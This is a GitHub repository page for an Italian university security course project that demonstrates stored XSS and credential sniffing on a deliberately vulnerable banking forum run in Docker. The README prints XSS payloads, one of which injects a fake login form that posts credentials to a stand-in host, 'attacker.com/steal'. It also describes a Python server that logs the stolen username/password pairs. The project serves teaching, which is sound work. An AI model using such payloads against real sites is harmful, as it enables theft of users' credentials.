Skip to content

Forum Bancario Vulnerabile. Progetto didattico che dimostra due vulnerabilità web, svolto per il corso di "Sicurezza" in "La Sapienza" nell'anno 2024/2025

License

Notifications You must be signed in to change notification settings

daromacarlo/Sicurezza

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Progetto di Sicurezza Informatica: Vulnerabilità XSS e Sniffing

Security Web Security Penetration Testing OWASP PHP Python MySQL Docker

Descrizione del Progetto

Questo progetto dimostra due vulnerabilità comuni nello sviluppo web:

  1. Cross-Site Scripting (XSS): Un attacco che permette l'esecuzione di codice JavaScript malevolo nel contesto di un'applicazione web
  2. Sniffing di credenziali: Un attacco che intercetta e registra dati sensibili inviati tramite form

Il progetto simula un forum bancario vulnerabile a XSS, con un server aggiuntivo che cattura le credenziali inviate tramite un form compromesso.

Componenti

  1. Servizio Web (Apache/PHP)

    • Forum bancario vulnerabile a XSS
    • Connessione a database MySQL
    • Nessuna sanificazione degli input/output
  2. Database MySQL

    • Contiene una tabella comments per memorizzare i post del forum
  3. Server di Sniffing (Python)

    • In ascolto sulla porta 5000
    • Cattura e registra le credenziali inviate via POST

Autori

Vulnerabilità Implementate

1. Cross-Site Scripting (XSS)

  • Posizione: Input del commento e visualizzazione nel forum
  • Esempio di payload:
    <script>alert('XSS Attack!')</script>
    <script>
      document.write('<form action="http://attacker.com/steal" method="post">' +
                     '<input type="text" name="username" placeholder="Username">' +
                     '<input type="password" name="password" placeholder="Password">' +
                     '<input type="submit" value="Submit"></form>');
    </script>

2. Sniffing di Credenziali

  • Il server Python (app.py) registra tutte le coppie username/password inviate via POST
  • I dati vengono salvati in sniffed.txt
  • Per non far riuscire il pop up ad utenti che hanno già eseguito il login abbiamo deciso di salvare delle variabili interne al browser.

Configurazione e Avvio

  1. Prerequisiti:

    • Docker e Docker Compose installati
  2. Avvio dei servizi:

    docker-compose up --build
    docker-compose ps
  3. Accesso all'applicazione:

  4. Ripristino:

    sudo docker-compose down -v

last update 20/06/2025

About

Forum Bancario Vulnerabile. Progetto didattico che dimostra due vulnerabilità web, svolto per il corso di "Sicurezza" in "La Sapienza" nell'anno 2024/2025

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •